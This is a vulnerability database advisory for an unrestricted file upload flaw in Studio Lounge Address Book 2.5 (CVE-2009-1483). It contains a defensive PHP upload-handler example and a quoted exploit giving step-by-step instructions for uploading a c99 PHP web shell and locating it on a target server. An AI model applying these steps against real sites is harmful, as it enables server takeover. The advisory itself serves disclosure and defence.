Studio Lounge Address Book 'upload-file.php' Unrestricted File Upload Vulnerability

Vulnerability ID: 1117622    Type: Other
Published: 2009-04-20    Updated: 2009-04-29
CVE: CVE-2009-1483    CNNVD-ID: CNNVD-200904-546
Platform: PHP    CVSS score: 6.8
|Vulnerability sources
https://www.exploit-db.com/exploits/8481
https://cxsecurity.com/issue/WLB-2009050083
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-546
|Vulnerability details
upload-file.php in Adam Patterson Studio Lounge Address Book 2.5 contains an unrestricted file upload vulnerability. A remote attacker can achieve arbitrary code execution by first uploading a file with an executable extension and then accessing it through a direct request to that file under profiles/.
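The root cause described above is that the upload handler trusts the client-supplied filename and stores the file under a web-served directory. The following is an added example of how a profile-image upload should be handled instead; it is not code from the Address Book project, and the `profiles_private` path, the `$_FILES['file']` field name and the size limit are assumptions.

```php
<?php
// Added example (not the Address Book project's code): a hardened profile-image
// upload that removes each condition the advisory relies on.
declare(strict_types=1);

// Assumed location: outside the web root, so a stored file can never be
// requested directly the way profiles/<name>.php was.
const UPLOAD_DIR = __DIR__ . '/../profiles_private';
const MAX_BYTES  = 2 * 1024 * 1024; // assumed limit
// Server decides the extension from the detected type; the client's name is discarded.
const ALLOWED = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

function store_profile_image(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    // Determine the type from the bytes, never from $file['name'] or $file['type'].
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime === false || !isset(ALLOWED[$mime])) {
        throw new RuntimeException('unsupported type');
    }
    // Re-encode through GD so only pixel data survives; embedded PHP in a
    // polyglot image does not make it into the stored file.
    $img = @imagecreatefromstring((string) file_get_contents($file['tmp_name']));
    if ($img === false) {
        throw new RuntimeException('not a valid image');
    }
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime]; // server-chosen name
    $dest = UPLOAD_DIR . '/' . $name;
    $ok = match (ALLOWED[$mime]) {
        'jpg' => imagejpeg($img, $dest, 85),
        'png' => imagepng($img, $dest),
        'gif' => imagegif($img, $dest),
    };
    imagedestroy($img);
    if (!$ok) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);
    return $name; // caller serves it via a read-only script, not by path
}
```

Even with these checks, the directory that does hold uploads should have script execution disabled at the web server, so a missed case cannot turn a stored file into a remote shell.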
|Exploit
Address Book 2.5 (profile) Remote Shell Upload Vulnerability
bug found by Jose Luis Gongora Fernandez (a.k.a) JosS

contact: sys-project[at]hotmail.com
website: http://www.hack0wn.com/

- download: http://www.studiolounge.net/2007/08/17/address-book-25

- vuln file: upload-file.php

  The upload-file.php doesn't check the type of archive
  and you can upload the phpshell on the server.


~ [EXPLOITING]

1) /index2.php?title=add (upload your shell, ex: c99.php)
2) you should go to your "View Full Information" (ex: index2.php?title=fullview&id=150)
3) you view source code and search "profiles/imagethumb.php?s=" (ex: profiles/imagethumb.php?s=57b7b72739c79f02d990c4239c4169b9.php)

4) view shell: http://target/profiles/57b7b72739c79f02d990c4239c4169b9.php

__h0__

# milw0rm.com [2009-04-20]
|References

Source: XF
Name: addressbook-uploadfile-file-upload(49972)
Link: http://xforce.iss.net/xforce/xfdb/49972
Source: VUPEN
Name: ADV-2009-1111
Link: http://www.vupen.com/english/advisories/2009/1111
Source: BID
Name: 34652
Link: http://www.securityfocus.com/bid/34652
Source: OSVDB
Name: 53813
Link: http://www.osvdb.org/53813
Source: MILW0RM
Name: 8481
Link: http://www.milw0rm.com/exploits/8481
Source: SECUNIA
Name: 34761
Link: http://secunia.com/advisories/34761